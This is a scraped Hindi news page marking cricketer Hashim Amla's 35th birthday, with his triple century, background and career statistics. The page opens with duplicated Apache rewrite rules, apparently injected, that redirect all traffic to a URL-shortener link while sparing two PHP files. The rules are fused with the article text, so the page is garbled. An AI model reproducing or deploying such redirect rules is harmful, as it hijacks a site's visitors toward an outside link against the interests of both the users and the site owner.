
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 719
Previousनई दिल्ली। हाशिम अमला साउथ अफ्रीका के लिए टेस्ट क्रिकेट में तिहरा शतक लगाने वाले इकलौते बल्लेबाज़ हैं। उन्होंने यह कारनाम जुलाई 2012 में इंग्लैंड के खिलाफ ओवल में 311 रन की नाबाद पारी के साथ किया था। आज यानि 31 मार्च को साउथ अफ्रीका के धाकड़ बल्लेबाज़ हाशिम अमला अपना 35वां जन्मदिन मना रहे हैं। इस खिलाड़ी को उनकी बल्लेबाज़ी शैली के अलावा टेम्परामेंट के लिए पूरा क्रिकेट विश्व सलाम करता है। अमला इस वक्त साउथ अफ्रीका के क्रिकेट के तीनों फॉर्मेट में सबसे उम्दा बल्लेबाज़ हैं।
हाशिम अमला का जन्म 31 मार्च 1983 को डरबन में हुआ। हालांकि उनके ग्रांडफादर मूलत: गुजरात के सूरत शहर के रहने वाले थे। अमला धार्मिक मुसलमान हैं। इस कारण वह शराब या फिर तम्बाकू जैसे ब्रांड के लोगो वाली जर्सी नहीं पहनते हैं। उनकी पत्नी का सुमैयाह अमला है। उनके दो बच्चे हैं, एक बेटा और एक बेटी। साउथ अफ्रीका ने हाशिम अमला के नेतृत्व 2002 आईसीसी अंडर-19 क्रिकेट विश्व कप में फाइनल में जगह बनाई थी। अमला की टीम को सात विकेट से हराकर आॅस्ट्रेलिया चैंपियन बनी थी। इसके बाद 2004 में अमला को इंटरनेशनल क्रिकेट में डेब्यू करने का मौका मिला था। अमला ने अब तक साउथ अफ्रीका के लिए 116 टेस्ट, 164 वनडे और 43 टी20 इंटरनेशनल मैच खेले हैं। टेस्ट में उनके नाम 8939, वनडे में 7535 और टी20 में 1277 रन दर्ज हैं।